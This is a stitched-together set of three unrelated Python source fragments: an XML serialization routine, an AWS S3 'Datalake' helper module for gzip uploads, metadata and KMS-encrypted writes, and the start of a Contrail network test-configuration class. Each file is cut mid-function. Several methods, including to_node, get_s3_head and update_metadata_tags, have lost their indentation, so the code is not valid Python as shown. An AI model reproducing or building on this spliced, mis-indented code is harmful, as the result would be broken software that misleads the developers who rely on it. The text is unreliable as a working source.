                fetch_tag = '{' + xml_ns[the_xml_ns_key] + '}' + the_tag
            else:
                fetch_tag = the_tag
            kwargs[the_attribute] = node.attrib.get(fetch_tag, None)

        def handle_single(the_attribute, the_tag, the_xml_ns_key):
            kwargs[the_attribute] = find_first_child(node, the_tag, xml_ns, the_xml_ns_key)

        def handle_list(attrib, ch_tag, the_xml_ns_key):
            cnodes = find_children(node, ch_tag, xml_ns, the_xml_ns_key)
            if len(cnodes) > 0:
                kwargs[attrib] = cnodes

        if kwargs is None:
            kwargs = {}
        kwargs['_xml_ns'] = xml_ns
        kwargs['_xml_ns_key'] = ns_key
        if not isinstance(kwargs, dict):
            raise ValueError(
                "Named input argument kwargs for class {} must be dictionary instance".format(cls))

        for attribute in cls._fields:
            if attribute in kwargs:
                continue

            kwargs[attribute] = None
            # This value will be replaced if tags are present
            # Note that we want to try explicitly setting to None to trigger descriptor behavior
            # for required fields (warning or error)

            base_tag_name = cls._tag_overide.get(attribute, attribute)

            # determine any expected xml namespace for the given entry
            if attribute in cls._child_xml_ns_key:
                xml_ns_key = cls._child_xml_ns_key[attribute]
            else:
                xml_ns_key = ns_key
            # verify that the xml namespace will work
            if xml_ns_key is not None:
                if xml_ns is None:
                    raise ValueError('Attribute {} in class {} expects an xml namespace entry of {}, '
                                     'but xml_ns is None.'.format(attribute, cls, xml_ns_key))
                elif xml_ns_key not in xml_ns:
                    raise ValueError('Attribute {} in class {} expects an xml namespace entry of {}, '
                                     'but xml_ns does not contain this key.'.format(attribute, cls, xml_ns_key))

            if attribute in cls._set_as_attribute:
                xml_ns_key = cls._child_xml_ns_key.get(attribute, None)
                handle_attribute(attribute, base_tag_name, xml_ns_key)
            elif attribute in cls._collections_tags:
                # it's a collection type parameter
                array_tag = cls._collections_tags[attribute]
                array = array_tag.get('array', False)
                child_tag = array_tag.get('child_tag', None)
                if array:
                    handle_single(attribute, base_tag_name, xml_ns_key)
                elif child_tag is not None:
                    handle_list(attribute, child_tag, xml_ns_key)
                else:
                    # the metadata is broken
                    raise ValueError(
                        'Attribute {} in class {} is listed in the _collections_tags dictionary, but the '
                        '`child_tag` value is either not populated or None.'.format(attribute, cls))
            else:
                # it's a regular property
                handle_single(attribute, base_tag_name, xml_ns_key)
        return cls.from_dict(kwargs)
def to_node(self, doc, tag, ns_key=None, parent=None, check_validity=False, strict=DEFAULT_STRICT, exclude=()):
"""For XML serialization, to a dom element.
Parameters
----------
doc : ElementTree.ElementTree
The xml Document
tag : None|str
The tag name. Defaults to the value of `self._tag` and then the class name if unspecified.
ns_key : None|str
The namespace prefix. This will be recursively passed down, unless overridden by an entry in the
_child_xml_ns_key dictionary.
parent : None|ElementTree.Element
The parent element. Defaults to the document root element if unspecified.
check_validity : bool
Check whether the element is valid before serializing, by calling :func:`is_valid`.
strict : bool
Only used if `check_validity = True`. In that case, if `True` then raise an
Exception (of appropriate type) if the structure is not valid, if `False` then log a
hopefully helpful message.
exclude : tuple
Attribute names to exclude from this generic serialization. This allows for child classes
| |
import os
from pathlib import Path
from typing import Tuple
import boto3
from botocore.client import Config
import gzip
import re
from uuid import uuid4
import json
import query_string
import smart_open.s3
import shutil
import tempfile
import io
from urllib.parse import urlencode
import logging
from .__util_versioned_ref import VersionedRef
from .__util_metadata import FIELDS
# File categories a pipeline task is permitted to write into.
WRITE_ALLOWED_CATEGORIES = ['IDS', 'PROCESSED', 'TMP']
# NOTE(review): environment values are strings; any non-empty value
# (including 'false') is truthy where DISABLE_GZIP is used as a flag - confirm intended.
DISABLE_GZIP = os.environ.get('DISABLE_GZIP')
ENV = os.environ.get('ENV')
AWS_REGION = os.environ.get('AWS_REGION')
MULTIPART_SIZE = 100 * 1024 * 1024 # don't use multipart if file size is smaller than 100MB
LARGE_FILE_SIZE_THRESHOLD_BYTES = 5 * 2**30 # We have to handle files that are > 5 GB differently
def get_kms_key_name(org_slug):
    """Return the KMS key alias used to encrypt data for *org_slug*."""
    return 'alias/customer-key-{}-{}'.format(ENV, org_slug)
def lowerMetadataKeys(metadata):
    """Return a copy of *metadata* with every key lower-cased.

    S3 user metadata keys are case-insensitive and may come back with
    arbitrary casing; normalizing once lets the rest of the module look
    them up with the lowercase FIELDS constants.
    """
    # Idiomatic dict comprehension replaces the manual accumulator loop.
    return {key.lower(): value for key, value in metadata.items()}
def resolveCustomMetadataAndTags(metadata):
    """Split raw S3 metadata into parsed custom metadata and a tag list.

    The custom-metadata field is stored query-string encoded; the tags
    field is a comma-separated string (empty string -> no tags).
    """
    raw_meta = metadata.get(FIELDS["CUSTOM_METADATA"], "") or ""
    raw_tags = metadata.get(FIELDS["CUSTOM_TAGS"], "") or ""
    tags = raw_tags.split(",") if raw_tags else []
    return {
        'custom_metadata': query_string.parse(raw_meta),
        'custom_tags': tags,
    }
def getOrEmptyString(dic, key, default=''):
    """Look up *key* in *dic*, treating both a missing key and an explicit
    None value as absent; return *default* in either case."""
    value = dic.get(key, default)
    return default if value is None else value
class InvalidPathException(Exception):
    """Raised when a datalake file path fails validation."""

    def __init__(self, path, reason):
        message = f'Invalid path {path}: {reason}'
        super().__init__(message)
        # Keep the raw pieces available for programmatic handling.
        self.path = path
        self.reason = reason
def getUpdatedPipelineHistoryStr(pipeline_id, existing_pipeline_history):
    """Append *pipeline_id* to a comma-separated pipeline history string.

    The id is appended only when it is not already present, keeping the
    history duplicate-free.

    Bug fix: the previous implementation used a plain substring test
    (`pipeline_id in existing_pipeline_history`), which falsely treated
    an id as present whenever it was a substring of another id in the
    history (e.g. 'p1' vs 'p1x'). We now compare against the individual
    comma-separated entries.
    """
    if existing_pipeline_history == '':
        return pipeline_id
    if pipeline_id in existing_pipeline_history.split(','):
        return existing_pipeline_history
    return existing_pipeline_history + "," + pipeline_id
class S3FileobjUploader:
    """Upload a file-like object to S3, gzip-compressing on the fly.

    Data is buffered in an in-memory BytesIO. Once the buffer reaches
    MULTIPART_SIZE the uploader switches to the S3 multipart-upload API,
    flushing one part per buffer-full; smaller payloads are sent with a
    single put_object call.
    """

    def __init__(self, s3, fileobj, params, options=None):
        """
        Parameters
        ----------
        s3 : S3 client used for every upload call.
        fileobj : readable binary file-like object supplying the payload.
        params : dict of keyword arguments forwarded to put_object /
            create_multipart_upload (Bucket, Key, Metadata, ...).
        options : optional dict; key 'disable_gzip' (default False)
            skips compression.

        Bug fix: the default for *options* was a mutable dict literal,
        which is shared across calls; use a None sentinel instead.
        """
        if options is None:
            options = {'disable_gzip': False}
        self.s3 = s3
        self.fileobj = fileobj
        self.params = params
        self.disable_gzip = options.get('disable_gzip', False)
        self.stream = io.BytesIO()
        self.partCount = 0
        self.multipart = None
        self.parts = []
        if not self.disable_gzip:
            # The compressor writes gzip bytes straight into self.stream.
            self.compressor = gzip.GzipFile(fileobj=self.stream, mode='w')

    def _uploadPart(self):
        """Flush the in-memory buffer as the next multipart part."""
        print(f'upload multipart {self.partCount}')
        if self.partCount == 0:
            # Lazily start the multipart upload on the first flush.
            self.multipart = self.s3.create_multipart_upload(**self.params)
        self.partCount += 1
        self.stream.seek(0)
        part = self.s3.upload_part(
            Body=self.stream,
            Bucket=self.multipart['Bucket'],
            Key=self.multipart['Key'],
            PartNumber=self.partCount,
            UploadId=self.multipart['UploadId'])
        self.parts.append({ **part, 'PartNumber': self.partCount })
        # Reset the buffer for the next part.
        self.stream.seek(0)
        self.stream.truncate()

    def _uploadLastPart(self):
        """Finish the upload: single put_object, or multipart completion."""
        if self.partCount == 0:
            # Everything fit in one buffer; no multipart upload was started.
            self.stream.seek(0)
            return self.s3.put_object(
                Body=self.stream,
                **self.params)
        else:
            self._uploadPart()
            parts = []
            for part in self.parts:
                parts.append({
                    'ETag': part['ETag'],
                    'PartNumber': part['PartNumber']
                })
            return self.s3.complete_multipart_upload(
                Bucket=self.multipart['Bucket'],
                Key=self.multipart['Key'],
                UploadId=self.multipart['UploadId'],
                MultipartUpload={ 'Parts': parts })

    def upload(self):
        """Drive the upload loop; return the final S3 response dict."""
        while True:
            chunk = self.fileobj.read(1024 * 1024)
            if not chunk:
                if not self.disable_gzip:
                    # Flush the gzip trailer into the buffer before sending.
                    self.compressor.close()
                return self._uploadLastPart()
            if self.disable_gzip:
                self.stream.write(chunk)
            else:
                self.compressor.write(chunk)
            if self.stream.tell() >= MULTIPART_SIZE:
                self._uploadPart()
class Datalake:
    def __init__(self, endpoint):
        """Create an S3-backed datalake client.

        Parameters
        ----------
        endpoint : str or falsy
            Custom S3 endpoint URL (e.g. a local fakeS3 used in tests).
            When falsy, the default AWS endpoint for AWS_REGION is used.
        """
        #boto3.set_stream_logger(name='botocore', level=logging.DEBUG)
        if endpoint:
            # Dummy credentials: a custom endpoint implies a local/fake S3.
            self.s3 = boto3.client(
                's3', endpoint_url=endpoint,
                aws_access_key_id='123', aws_secret_access_key='abc',
                region_name=AWS_REGION, config=Config(signature_version='s3v4'))
            # Forwarded to smart_open so streamed reads hit the same endpoint.
            self.resource_kwargs = { 'endpoint_url': endpoint }
        else:
            self.s3 = boto3.client('s3', region_name=AWS_REGION, config=Config(signature_version='s3v4'))
            self.resource_kwargs = None
def get_s3_head(self, file):
bucket = file['bucket']
file_key = file['fileKey']
if 'version' in file:
file_version = file['version']
head = self.s3.head_object(Bucket=bucket, Key=file_key, VersionId=file_version)
else:
head = self.s3.head_object(Bucket = bucket, Key = file_key)
return head
def get_file_meta(self, file):
head = self.get_s3_head(file)
return lowerMetadataKeys(head.get('Metadata'))
    def read_file(self, file, form='body'):
        """Read an S3 file, transparently gunzipping gzip-encoded content.

        Parameters
        ----------
        file : dict
            Must contain 'bucket' and 'fileKey'; optional 'version'.
        form : str
            'body'     - full decoded content returned in result['body'];
            'file_obj' - streaming file object returned in result['file_obj'];
            'download' - content copied to a temp file, path in result['download'].

        Returns a dict with 'metadata' (lower-cased keys), the resolved
        custom metadata/tags, plus one of the keys described above.
        Raises ValueError for an unknown *form* and a generic Exception
        on a non-200 S3 response.
        """
        bucket = file['bucket']
        file_key = file['fileKey']
        if 'version' in file:
            kwargs = {'VersionId': file['version']}
        else:
            kwargs = {}
        if form == 'body':
            response = self.s3.get_object(Bucket=bucket, Key=file_key, **kwargs)
        elif form in ['file_obj', 'download']:
            # Only metadata is needed here; content is streamed separately
            # through smart_open below.
            response = self.s3.head_object(Bucket=bucket, Key=file_key, **kwargs)
        else:
            raise ValueError(f'Invalid form={form}; supported values are body, file_obj and download')
        status_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode')
        if not status_code == 200:
            print({ 'level': 'error', 'message': response })
            raise Exception('Invalid response code')
        meta = lowerMetadataKeys(response.get('Metadata'))
        result = { 'metadata': meta, **resolveCustomMetadataAndTags(meta) }
        if form == 'body':
            content = response.get('Body').read()
            if response.get('ContentEncoding') == 'gzip':
                result['body'] = gzip.decompress(content)
            else:
                result['body'] = content
        else:
            file_obj = smart_open.s3.open(bucket, file_key, 'rb', file.get('version'), resource_kwargs=self.resource_kwargs)
            if response.get('ContentEncoding') == 'gzip':
                # Wrap the stream so callers read decompressed bytes.
                file_obj = gzip.open(file_obj)
            if form == 'download':
                # delete=False: the temp file must outlive this call;
                # the caller is responsible for removing it.
                with tempfile.NamedTemporaryFile(mode='wb', delete=False) as tf:
                    shutil.copyfileobj(file_obj, tf)
                result['download'] = tf.name
                file_obj.close()
            else:
                result['file_obj'] = file_obj
        return result
    @classmethod
    def _is_file_path_valid(cls, filepath) -> Tuple[bool, str]:
        """Return (is_valid, reason); rejects any path containing a '..' component.

        Guards against path-traversal in derived S3 keys.
        """
        filepath = Path(filepath)
        # Check the final component and every ancestor component for '..'.
        if filepath.name == '..' or '..' in (parent.name for parent in filepath.parents):
            return False, 'Path cannot contain a directory ".."'
        return True, ''
    # NOTE(review): labels=[] is a mutable default argument; it is only read
    # here (never mutated), but consider a None sentinel.
    def write_file(self, context, content, file_name, file_category, raw_file, file_meta, ids = None, source_type = None, labels = []):
        """Write *content* as a new datalake file derived from *raw_file*.

        The new S3 key is built from the raw file's key as
        <org_slug>/<source_id>/<file_category>/<raw_file_path>/<file_name>,
        the object is KMS-encrypted with the org's key and (unless
        DISABLE_GZIP is set) gzip-compressed.

        Parameters
        ----------
        context : dict with pipeline execution info (pipelineId, workflowId, ...).
        content : bytes, str, or a readable file-like object.
        file_name : name of the new file.
        file_category : one of WRITE_ALLOWED_CATEGORIES.
        raw_file : dict with 'bucket' and 'fileKey' of the originating file.
        file_meta : lower-cased metadata of the raw file.
        ids : IDS composite reference; required when file_category == 'IDS'.
        source_type : optional lowercase source type; taken from file_meta
            when not given.
        labels : optional list; when non-empty a companion labels file is created.

        Returns a dict describing the written file (bucket, key, id, version).
        """
        bucket = raw_file['bucket']
        raw_file_key = raw_file['fileKey']
        if not(file_category in WRITE_ALLOWED_CATEGORIES):
            raise Exception(f'{file_category} is not allowed category for write_file')
        if file_category == 'IDS' and ids is None:
            raise Exception('ids can not be None when file_category is IDS')
        ids_obj = VersionedRef(composite=ids)
        # Raw key layout: <org_slug>/<source_id>/<category>/<path...>
        pattern = '(.*?)/(.*?)/(?:.*?)/(.*)'
        match = re.match(pattern, raw_file_key, flags=re.DOTALL)
        if not match:
            raise Exception(f'Raw file key {raw_file_key} does not match "{pattern}"')
        if source_type is not None:
            # Only lowercase alphanumerics and dashes are allowed.
            source_type_match = re.match('^[-a-z0-9]+$', source_type)
            if not source_type_match:
                raise Exception(f'Source type "{source_type}" contains invalid character or upper case letter')
        else:
            source_type = getOrEmptyString(file_meta, FIELDS['SOURCE_TYPE'], 'unknown')
        org_slug, source_id, raw_file_path = match.groups()
        file_key = os.path.join(org_slug, source_id, file_category, raw_file_path, file_name)
        is_valid_file_key, reason = self._is_file_path_valid(file_key)
        if not is_valid_file_key:
            raise InvalidPathException(file_key, reason)
        file_id = str(uuid4())
        pipelineConfig = context.get('pipelineConfig', {})
        pipeline_history_str = getUpdatedPipelineHistoryStr(getOrEmptyString(context, 'pipelineId'),
                                                            getOrEmptyString(file_meta, FIELDS['PIPELINE_HISTORY']))
        meta = {
            # constant
            FIELDS['INTEGRATION_TYPE']: 'datapipeline',
            FIELDS['VERSION']: '2',
            # generated
            FIELDS['FILE_ID']: file_id,
            # from raw file
            FIELDS['RAW_FILE_ID']: getOrEmptyString(file_meta, FIELDS['FILE_ID']),
            FIELDS['CUSTOM_METADATA']: getOrEmptyString(file_meta, FIELDS['CUSTOM_METADATA']),
            FIELDS['CUSTOM_TAGS']: getOrEmptyString(file_meta, FIELDS['CUSTOM_TAGS']),
            FIELDS['SOURCE_NAME']: getOrEmptyString(file_meta, FIELDS['SOURCE_NAME']),
            FIELDS['SOURCE_TYPE']: source_type,
            FIELDS['TRACE_ID']: getOrEmptyString(file_meta, FIELDS['TRACE_ID']),
            # IDS/TMP
            **({
                FIELDS['IDS']: ids_obj.composite,
                FIELDS['IDS_TYPE']: ids_obj.name,
                FIELDS['IDS_VERSION']: ids_obj.version,
            } if ids is not None and (file_category == 'IDS' or file_category == 'TMP') else {}),
            # from pipeline context
            FIELDS['INTEGRATION_ID']: getOrEmptyString(context, 'pipelineId'), # pipeline id
            # https://github.com/tetrascience/ts-service-pipeline/blob/development/src/models/create-workflow-command.js#L171
            FIELDS['INTEGRATION_NAME']: getOrEmptyString(pipelineConfig, 'pipelineName'),
            FIELDS['PIPELINE_ID']: getOrEmptyString(context, 'pipelineId'),
            FIELDS['PIPELINE_WORKFLOW_ID']: getOrEmptyString(context, 'workflowId'),
            FIELDS['PIPELINE_MASTER_SCRIPT']: f"{context.get('masterScriptNamespace', '')}/{context.get('masterScriptSlug', '')}:{context.get('masterScriptVersion', '')}",
            FIELDS['PIPELINE_TASK_EXECUTION_ID']: getOrEmptyString(context, 'taskId'),
            FIELDS['PIPELINE_TASK_SCRIPT']: getOrEmptyString(context, 'taskScript'),
            FIELDS['PIPELINE_TASK_SLUG']: getOrEmptyString(context, 'taskSlug'),
            FIELDS['PIPELINE_HISTORY']: pipeline_history_str
        }
        params = {
            'Bucket': bucket,
            'Key': file_key,
            'Metadata': meta,
            'ServerSideEncryption': 'aws:kms',
            'SSEKMSKeyId': get_kms_key_name(org_slug),
            'ContentEncoding': 'gzip'
        }
        if len(labels) > 0:
            # Companion labels file is written before the data file itself.
            self.create_labels_file(
                target_file={
                    'type': 's3file',
                    'bucket': bucket,
                    'fileKey': file_key,
                    'fileId': file_id
                },
                labels=labels,
                sse_kms_key_id=get_kms_key_name(org_slug)
            )
        version_id = ''
        if hasattr(content, 'read'):
            # Streaming input: delegate chunked/multipart handling.
            response = S3FileobjUploader(
                self.s3, content, params, { 'disable_gzip': DISABLE_GZIP }).upload()
            # fakeS3 does not return VersionId, so use '' to avoid an exception
            version_id = response.get('VersionId', '')
            print({'level': 'debug', 'message': 'file created', 'response': response})
        else:
            if not DISABLE_GZIP:
                if (isinstance(content, str)):
                    content = content.encode()
                content = gzip.compress(content)
            file_size = len(content) or 0
            if file_size >= LARGE_FILE_SIZE_THRESHOLD_BYTES:
                print({'level': 'debug', 'message': 'writing a 5+ GB file to s3'})
                # the upload_fileobj method requires a file like object that implements read. This means we have to
                # wrap content into an in memory stream. We will use BytesIO instead of StringIO since the metadata has
                # to be encoded. This means that if content is a string, we have to convert it to bytes first.
                file_like_obj = None
                if type(content) is str:
                    file_like_obj = io.BytesIO(content.encode('utf-8'))
                else:
                    # content was already bytes so we should not try to encode it again
                    file_like_obj = io.BytesIO(content)
                try:
                    extra_args = self.extract_extra_args_from_params(params)
                    self.s3.upload_fileobj(Fileobj=file_like_obj, Bucket=bucket, Key=file_key, ExtraArgs=extra_args)
                    # upload_fileobj does not return the response; fetch the
                    # version from a follow-up lookup instead.
                    version_id = self.get_latest_obj_version(bucket, file_key)
                    print({'level': 'debug', 'message': 'file created'})
                except Exception as e:
                    raise Exception("encountered an error updating the metadata because of {}".format(e))
                finally:
                    file_like_obj.close()
            else:
                response = self.s3.put_object(Body=content, **params)
                # fakeS3 does not return VersionId, so use '' to avoid an exception
                version_id = response.get('VersionId', '')
                print({ 'level': 'debug', 'message': 'file created', 'response': response })
        result_file = {
            'type': 's3file',
            'bucket': bucket,
            'fileKey': file_key,
            'fileId': file_id,
            'version': version_id
        }
        return result_file
def update_metadata_tags(self, context, file, custom_meta, custom_tags, options = {}):
bucket = file['bucket']
file_key = file['fileKey']
head = self.get_s3_head(file)
current_meta = lowerMetadataKeys(head.get('Metadata'))
if not FIELDS['FILE_ID'] in current_meta:
raise Exception('no FILE_ID in meta!')
if (not custom_meta) and (not custom_tags):
print({'level': 'debug', 'message': 'no action taken because no metadata or tags provided'})
return file
isASCII = lambda s: s and isinstance(s, str) and bool(re.match(r'^[\x00-\x7F]*$', s))
custom_meta_str = current_meta.get(FIELDS['CUSTOM_METADATA'], '') or ''
current_custom_meta = query_string.parse(custom_meta_str)
if custom_meta:
custom_meta_merged = {**current_custom_meta, **custom_meta}
custom_meta_merged = {k:v for k,v in custom_meta_merged.items() if v is not None}
for k,v in custom_meta_merged.items():
if not isASCII(k):
raise Exception(f'Metadata key {k} contains non-ASCII character')
if not isASCII(str(v)):
raise Exception(f'Metadata value {v} contains non-ASCII character')
custom_meta_str = urlencode(custom_meta_merged)
custom_tags_str = current_meta.get(FIELDS['CUSTOM_TAGS'], '')
if custom_tags:
custom_tags = list(map(lambda x: str(x), custom_tags))
for t in custom_tags:
if not isASCII(t):
raise Exception(f'Tag {t} contains non-ASCII character')
new_custom_tags = list(set(custom_tags_str.split(',') + custom_tags))
new_custom_tags.sort()
custom_tags_str = ','.join([t for t in new_custom_tags if t])
if len(custom_meta_str) + len(custom_tags_str) >= 1024 * 1.5:
raise Exception('Metadata and tags length larger than 1.5KB')
file_id = options.get('new_file_id', str(uuid4()))
pipelineConfig = context.get('pipelineConfig', {})
pipeline_history_str = getUpdatedPipelineHistoryStr(getOrEmptyString(context, 'pipelineId'),
getOrEmptyString(current_meta, FIELDS['PIPELINE_HISTORY']))
params = {
'Bucket': bucket,
'CopySource': f'/{bucket}/{file_key}',
# 'CopySourceIfUnmodifiedSince': head['LastModified'], # ensure no conflict?
'Key': file_key,
'ContentEncoding': head.get('ContentEncoding', None),
'ContentType': head['ContentType'],
'Metadata': {
**current_meta,
# constant
FIELDS['INTEGRATION_TYPE']: 'datapipeline',
FIELDS['VERSION']: '2',
| |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import next
from builtins import range
from builtins import object
import os
import re
import sys
import json
import time
import socket
import getpass
import configparser
import ast
from netaddr import *
import fixtures
from fabric.api import env, run, local, sudo
from fabric.operations import get, put, reboot
from fabric.context_managers import settings, hide
from fabric.exceptions import NetworkError
from fabric.contrib.files import exists
from tcutils.util import *
from tcutils.util import custom_dict, read_config_option, get_build_sku, retry
from tcutils.custom_filehandler import *
from tcutils.contrail_status_check import ContrailStatusChecker
from keystone_tests import KeystoneCommands
from tempfile import NamedTemporaryFile
import re
from common import log_orig as contrail_logging
from common.contrail_services import *
import subprocess
from collections import namedtuple
import random
from vnc_api import utils
import argparse
import yaml
from future.utils import with_metaclass
# Default auth/tenant domain per orchestrator type.
ORCH_DEFAULT_DOMAIN = {
    'openstack' : 'Default',
    'kubernetes': 'default-domain',
    'vcenter': 'default-domain',
}
# Fallback TLS material used when the input file does not override it.
DEFAULT_CERT = '/etc/contrail/ssl/certs/server.pem'
DEFAULT_PRIV_KEY = '/etc/contrail/ssl/private/server-privkey.pem'
DEFAULT_CA = '/etc/contrail/ssl/certs/ca-cert.pem'
# CI guest images; overridable via environment.
DEFAULT_CI_IMAGE = os.getenv('DEFAULT_CI_IMAGE', 'cirros')
DEFAULT_CI_SVC_IMAGE = os.getenv('DEFAULT_CI_SVC_IMAGE', 'cirros_in_net')
CI_IMAGES = [DEFAULT_CI_IMAGE, DEFAULT_CI_SVC_IMAGE]
# Kubeconfig locations for openshift vs vanilla k8s deployments.
OPENSHIFT_CONFIG_FILE = '/root/.kube/config'
K8S_CONFIG_FILE = '/etc/kubernetes/admin.conf'
# License: PSF License 2.0
# Copyright (c) 2003-2005 by <NAME> <<EMAIL>>
# https://hg.python.org/cpython/file/d37f963394aa/Lib/subprocess.py
# monkey patch subprocess.check_output cos its not supported in 2.6
if "check_output" not in dir(subprocess):  # duck punch it in!
    def f(*popenargs, **kwargs):
        # Backport of subprocess.check_output: run the command, capture
        # stdout, and raise CalledProcessError on a non-zero exit.
        if 'stdout' in kwargs:
            raise ValueError(
                'stdout argument not allowed, it will be overridden.')
        process = subprocess.Popen(
            stdout=subprocess.PIPE,
            *popenargs,
            **kwargs)
        output, unused_err = process.communicate()
        retcode = process.poll()
        if retcode:
            cmd = kwargs.get("args")
            if cmd is None:
                cmd = popenargs[0]
            # NOTE(review): the upstream backport also attaches the captured
            # output to the exception; Python 2.6's CalledProcessError does
            # not accept an 'output' argument, which is presumably why it is
            # omitted here - confirm before changing.
            raise subprocess.CalledProcessError(retcode, cmd)
        return output
    subprocess.check_output = f
class TestInputs(with_metaclass(Singleton, object)):
'''
Class that would populate testbedinfo from parsing the
.ini and .json input files if provided (or)
check the keystone server to populate
the same with the certain default value assumptions
'''
    def __init__(self, input_file, logger=None):
        """Parse *input_file* and derive connection/protocol settings.

        Populates topology data via parse_yml_file(), resolves the
        http/https protocol for the config API, analytics API and
        introspect endpoints, builds combined cert bundles when TLS is
        enabled, and records the per-role service lists used by status
        checks.
        """
        self.jenkins_trigger = self.get_os_env('JENKINS_TRIGGERED')
        # Lazily-resolved per-host OS type mapping.
        self.os_type = custom_dict(self.get_os_version, 'os_type')
        self.config = None
        self.input_file = input_file
        self.logger = logger or contrail_logging.getLogger(__name__)
        self.tor_agent_data = {}
        self.sriov_data = []
        self.dpdk_data = {}
        self.mysql_token = None
        self.pcap_on_vm = False
        # Reads the testbed yaml and sets most instance attributes
        # referenced below (fip_pool, host_data, cfgm_ip, ...).
        self.parse_yml_file()
        if self.fip_pool:
            update_reserve_cidr(self.fip_pool)
        if not self.ui_browser and (self.verify_webui or self.verify_horizon):
            raise ValueError(
                "Verification via GUI needs 'browser' details. Please set the same.")
        self.username = self.host_data[self.cfgm_ip]['username']
        self.password = self.host_data[self.cfgm_ip]['password']
        # OS_INSECURE in the environment overrides per-endpoint TLS checks.
        insecure = istrue(os.getenv('OS_INSECURE', False))
        if insecure:
            self.api_insecure = self.insecure = insecure
        keycertbundle = None
        if not self.insecure and self.auth_protocol == 'https' and \
                self.keystonecertfile and self.keystonekeyfile and \
                self.keystonecafile:
            keystone_bundle = '/tmp/' + get_random_string() + '.pem'
            keycertbundle = utils.getCertKeyCaBundle(keystone_bundle,
                [self.keystonecertfile, self.keystonekeyfile,
                 self.keystonecafile])
        # Derive per-endpoint protocols; SSL_ENABLE is the global default,
        # the endpoint-specific flags override it.
        protocol = 'https' if self.contrail_configs.get('SSL_ENABLE') else 'http'
        self.api_protocol = 'https' if self.contrail_configs.get(
            'CONFIG_API_SSL_ENABLE') else protocol
        self.analytics_api_protocol = 'https' if self.contrail_configs.get(
            'ANALYTICS_API_SSL_ENABLE') else protocol
        self.introspect_protocol = 'https' if self.contrail_configs.get(
            'INTROSPECT_SSL_ENABLE') else protocol
        if self.api_protocol == 'https':
            self.apicertfile = self.contrail_configs.get(
                'CONFIG_API_SERVER_CERTFILE') or DEFAULT_CERT
            self.apikeyfile = self.contrail_configs.get(
                'CONFIG_API_SERVER_KEYFILE') or DEFAULT_PRIV_KEY
            self.apicafile = self.contrail_configs.get(
                'CONFIG_API_SERVER_CA_CERTFILE') or DEFAULT_CA
        if self.introspect_protocol == 'https':
            self.introspect_certfile = self.contrail_configs.get(
                'INTROSPECT_CERTFILE') or DEFAULT_CERT
            self.introspect_keyfile = self.contrail_configs.get(
                'INTROSPECT_KEYFILE') or DEFAULT_PRIV_KEY
            self.introspect_cafile = self.contrail_configs.get(
                'INTROSPECT_CA_CERTFILE') or DEFAULT_CA
        if self.analytics_api_protocol == 'https':
            self.analytics_certfile = self.contrail_configs.get(
                'ANALYTICS_API_SERVER_CERTFILE') or DEFAULT_CERT
            self.analytics_keyfile = self.contrail_configs.get(
                'ANALYTICS_API_SERVER_KEYFILE') or DEFAULT_PRIV_KEY
            self.analytics_cafile = self.contrail_configs.get(
                'ANALYTICS_API_SERVER_CA_CERTFILE') or DEFAULT_CA
        apicertbundle = None
        if not self.api_insecure and self.api_protocol == 'https':
            api_bundle = '/tmp/' + get_random_string() + '.pem'
            apicertbundle = utils.getCertKeyCaBundle(api_bundle,
                [self.apicertfile, self.apikeyfile,
                 self.apicafile])
        analyticscertbundle = None
        if not self.analytics_api_insecure and self.analytics_api_protocol == 'https':
            analytics_bundle = '/tmp/' + get_random_string() + '.pem'
            analyticscertbundle = utils.getCertKeyCaBundle(analytics_bundle,
                [self.analytics_certfile, self.analytics_keyfile,
                 self.analytics_cafile])
        introspect_certbundle = None
        if not self.introspect_insecure and self.introspect_protocol == 'https':
            introspect_bundle = '/tmp/' + get_random_string() + '.pem'
            introspect_certbundle = utils.getCertKeyCaBundle(introspect_bundle,
                [self.introspect_certfile, self.introspect_keyfile,
                 self.introspect_cafile])
            # introspect_certbundle = self.introspect_cafile
        self.certbundle = None
        if keycertbundle or apicertbundle or introspect_certbundle or analyticscertbundle:
            # Merge every per-endpoint bundle into one file usable by all clients.
            bundle = '/tmp/' + get_random_string() + '.pem'
            certs = [cert for cert in [keycertbundle, apicertbundle, introspect_certbundle, analyticscertbundle] if cert]
            self.certbundle = utils.getCertKeyCaBundle(bundle, certs)
        # List of service correspond to each module
        self.compute_services = [
            'contrail-vrouter-agent',
            'contrail-vrouter-nodemgr']
        self.control_services = ['contrail-control',
                                 'contrail-control-nodemgr', 'contrail-dns',
                                 'contrail-named']
        self.cfgm_services = [
            'contrail-api',
            'contrail-schema',
            'contrail-svc-monitor',
            'contrail-config-nodemgr',
            'contrail-device-manager']
        self.webui_services = ['contrail-webui', 'contrail-webui-middleware']
        # NOTE(review): 'openstack-cinder-scheduler' appears twice below -
        # confirm whether the duplicate is intentional.
        self.openstack_services = [
            'openstack-cinder-api', 'openstack-cinder-scheduler',
            'openstack-cinder-scheduler', 'openstack-glance-api',
            'openstack-glance-registry', 'openstack-keystone',
            'openstack-nova-api', 'openstack-nova-scheduler', 'openstack-nova-conductor',
            'heat-api', 'heat-api-cfn', 'heat-engine', 'rabbitmq-server']
        self.collector_services = [
            'contrail-collector', 'contrail-analytics-api',
            'contrail-query-engine', 'contrail-analytics-nodemgr']
        self.database_services = [
            'contrail-database', 'contrail-database-nodemgr']
        self.correct_states = ['active', 'backup']
def _set_auth_vars(self):
'''
Set auth_protocol, auth_ip, auth_port from self.auth_url
'''
match = re.match(r'(.*?)://(.*?):([\d]+).*$', self.auth_url, re.M|re.I)
if match:
self.auth_protocol = match.group(1)
self.auth_ip = match.group(2)
self.auth_port = match.group(3)
# end _set_auth_vars
    def get_ips_of_host(self, host, nic=None):
        """Return the IP addresses configured on *host*, optionally for a
        single NIC; the all-NIC result is cached in host_data.

        NOTE(review): the bare get_ips_of_host(...) call below resolves to
        the module-level helper pulled in via the tcutils star-import, not
        to this method - the name shadowing is confusing but intentional
        as far as this code shows.
        """
        # Serve from cache only for the all-NICs query.
        if self.host_data[host].get('ips') and not nic:
            return self.host_data[host]['ips']
        username = self.host_data[host]['username']
        password = self.host_data[host]['password']
        ips = get_ips_of_host(self.get_host_ip(host), nic=nic,
                              username=username,
                              password=password,
                              as_sudo=True,
                              logger=self.logger)
        if not nic:
            self.host_data[host]['ips'] = ips
        return ips
    def _get_ip_for_service(self, host, service):
        """Resolve the IP address on *host* that *service* binds to.

        Falls back to *host* itself when no more specific address can be
        determined. NOTE(review): the 'control' branch returns None
        implicitly when no configured control IP matches the host's IPs -
        confirm callers tolerate that.
        """
